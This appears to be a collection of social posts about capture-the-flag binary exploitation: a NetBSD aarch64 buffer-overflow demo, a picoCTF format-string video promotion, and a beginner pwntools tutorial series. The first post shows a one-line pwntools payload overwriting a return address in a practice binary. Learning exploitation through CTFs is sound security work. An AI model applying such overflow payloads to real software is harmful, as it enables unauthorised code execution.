pwning NetBSD-aarch64 (ARM)
- http://www.feyrer.de/NetBSD/blog.html/nb_20260308_1932.html
#pwn #binaryexploitation #ctf #cybersecurity #pwntools #gdb #netbsd #arm #aarch64
pwning NetBSD-aarch64 (ARM)
- http://www.feyrer.de/NetBSD/blog.html/nb_20260308_1932.html
#pwn #binaryexploitation #ctf #cybersecurity #pwntools #gdb #netbsd #arm #aarch64
This afternoon's fun: pwning NetBSD-aarch64 (ARM)
(venv-pwn) qnetbsd$ python3 -c 'from pwn import * ; p = b"A" * 16 + p64(0x2001009f4); sys.stdout.buffer.write(p)' | ./win2
What is your name? Hello AAAAAAAAAAAAAAAA�
Goodbye, winner.
(venv-pwn) qnetbsd$ uname -a
NetBSD qnetbsd 11.0_RC2 NetBSD 11.0_RC2 (GENERIC64) #0: Wed Mar 4 21:02:00 UTC 2026 [email protected]:/usr/src/sys/arch/evbarm/compile/GENERIC64 evbarm
#pwn #netbsd #binaryexploitation #arm #aarch64 #pwntools #gdb #ctf
SaturdayMP Show 66: picoCTF Format String 2 (Solved in One Long Video)
In this episode I solve the @picoCTF Format String 2 problem in my longest video yet. Jump right to the end if you want to see the solution which used pwntools.
I think it gave me the knowledge to solve Format String 3, which I haven't solved yet: https://youtu.be/AT8w2fsgzsA. That said, I'm still struggling to picture the layout of variables on the stack.
Code on GitHub: https://github.com/mrbiggred/picoCTF
picoCTF: https://picoctf.org/
pwntools: https://docs.pwntools.com/
Found this video useful? Then help others find it by liking, subscribing, sharing, and sponsoring:
https://github.com/sponsors/saturdaymp/
Have question you want answered in a future video? A question I should ask you? Pair on a problem? Constructive feedback? Comment, DM me, or send an email to [email protected].
Contact me if you need help shipping secure high-quality software faster:
#saturdaymp #saturdaympshow #picoctf #cybersecurity #pwntools #formatstring2
Beginners introduction to pwntools for exploit development and CTFs
Part 1: https://www.archcloudlabs.com/projects/pwntools-bof/
Part 2: https://www.archcloudlabs.com/projects/pwntools-shellcraft/
Part 3: https://www.archcloudlabs.com/projects/pwntools-automating-interactions/
About The Project Pwndbg and Pwntools are Python frameworks for automating different parts of exploit development. These frameworks are highly popular amongst CTF players as they simplify and accelerate the creation of Proof of Concept (PoC) scripts for memory corruption exploits. I’m not proficient in using pwntools, and pwndbg, but this marks the beginning of a series of blogs aimed at improving my skills with pwntools for memory corruption CTF challenges.
pwntools — pwntools 4.7.0 documentation
#pwn #pwntools #exploit #generation #automatic #ctf #capturetheflag #tool